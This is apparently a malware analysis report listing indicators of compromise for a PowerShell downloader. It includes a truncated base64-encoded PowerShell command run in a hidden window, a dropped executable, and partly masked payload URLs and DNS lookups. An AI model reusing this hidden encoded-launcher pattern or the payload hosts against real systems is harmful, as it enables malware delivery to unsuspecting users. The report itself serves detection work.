Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHQAeQBlAGEAegA5AD0AJwBZAHgAZQBwAGUAZQBwACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBDAFUAcgBJAHQAYABZAGAAUABSAG8AdABvAGMAYABvAGwAIgAgAD0AIAAnAH...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %TEMP%\qrpo.exe
- http://sl#######vice-24-7-actief.nl/crjns/LODRmgim/
- http://yo#####puterneeds.net/wp-admin/JXjqdXqT/
- http://la###c.com.br/rkz_wgz_2mw77xw/NxS/
- http://la###smith.com/old-files/djrowrumw34o8s80545998/
- http://la###smith.com/cgi-sys/suspendedpage.cgi
- DNS ASK sl#######vice-24-7-actief.nl
- DNS ASK zu##.net
- DNS ASK yo#####puterneeds.net
- DNS ASK la###c.com.br
- DNS ASK la###smith.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHQAeQBlAGEAegA5AD0AJwBZAHgAZQBwAGUAZQBwACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBDAFUAcgBJAHQAYABZAGAAUABSAG8AdABvAGMAYABvAGwAIgAgAD0AIAAnAH...' (with hidden window)